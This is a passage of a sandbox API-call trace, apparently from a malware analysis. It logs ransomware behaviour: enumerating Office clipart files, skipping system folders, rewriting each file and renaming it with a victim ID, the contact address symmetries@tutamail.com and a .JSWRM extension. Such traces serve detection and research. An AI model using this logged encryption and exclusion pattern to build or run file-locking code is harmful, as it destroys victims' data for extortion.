lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.772] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2b30, lpOverlapped=0x0) returned 1 [0074.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.772] CloseHandle (hObject=0x460) returned 1 [0074.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0074.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0074.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0074.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0074.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0074.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.773] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0074.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.773] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30e8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00008_.WMF", cAlternateFileName="")) returned 1 [0074.773] lstrcmpiW (lpString1="BL00008_.WMF", lpString2=".") returned 1 [0074.773] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="..") returned 1 [0074.773] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="...") returned 1 [0074.773] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="windows") returned -1 [0074.773] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="recovery") returned -1 [0074.773] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="perflogs") returned -1 [0074.773] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="documents and settings") returned -1 [0074.774] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.774] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="system volume information") returned -1 [0074.774] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="msocache") returned -1 [0074.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0074.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00008_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00008_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00008_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0074.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0074.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00008_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00008_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00008_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0074.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.774] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12520) returned 1 [0074.774] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30e0) returned 0x24c1d0 [0074.774] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x30e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x30e0, lpOverlapped=0x0) returned 1 [0074.831] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.831] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x30e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x30e0, lpOverlapped=0x0) returned 1 [0074.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.831] CloseHandle (hObject=0x460) returned 1 [0074.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0074.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0074.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0074.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0074.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0074.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.832] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0074.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.833] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd4897d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd4897d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x265a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00012_.WMF", cAlternateFileName="")) returned 1 [0074.833] lstrcmpiW (lpString1="BL00012_.WMF", lpString2=".") returned 1 [0074.833] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="..") returned 1 [0074.833] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="...") returned 1 [0074.833] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="windows") returned -1 [0074.833] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="recovery") returned -1 [0074.833] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="perflogs") returned -1 [0074.833] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="documents and settings") returned -1 [0074.833] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.833] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="system volume information") returned -1 [0074.833] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="msocache") returned -1 [0074.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0074.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00012_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00012_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00012_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0074.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0074.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00012_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00012_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00012_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0074.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.834] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9818) returned 1 [0074.834] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2650) returned 0x24c1d0 [0074.834] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2650, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2650, lpOverlapped=0x0) returned 1 [0074.836] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.836] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2650, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2650, lpOverlapped=0x0) returned 1 [0074.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.836] CloseHandle (hObject=0x460) returned 1 [0074.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0074.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0074.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0074.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0074.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0074.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.837] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0074.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.837] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1eb6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00045_.WMF", cAlternateFileName="")) returned 1 [0074.837] lstrcmpiW (lpString1="BL00045_.WMF", lpString2=".") returned 1 [0074.837] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="..") returned 1 [0074.837] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="...") returned 1 [0074.837] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="windows") returned -1 [0074.837] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="recovery") returned -1 [0074.837] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="perflogs") returned -1 [0074.837] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="documents and settings") returned -1 [0074.838] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.838] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="system volume information") returned -1 [0074.838] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="msocache") returned -1 [0074.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00045_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00045_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00045_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0074.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00045_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00045_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00045_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0074.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.838] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7862) returned 1 [0074.838] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1eb0) returned 0x24c1d0 [0074.838] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1eb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1eb0, lpOverlapped=0x0) returned 1 [0074.840] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.840] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1eb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1eb0, lpOverlapped=0x0) returned 1 [0074.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.841] CloseHandle (hObject=0x460) returned 1 [0074.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0074.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0074.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) 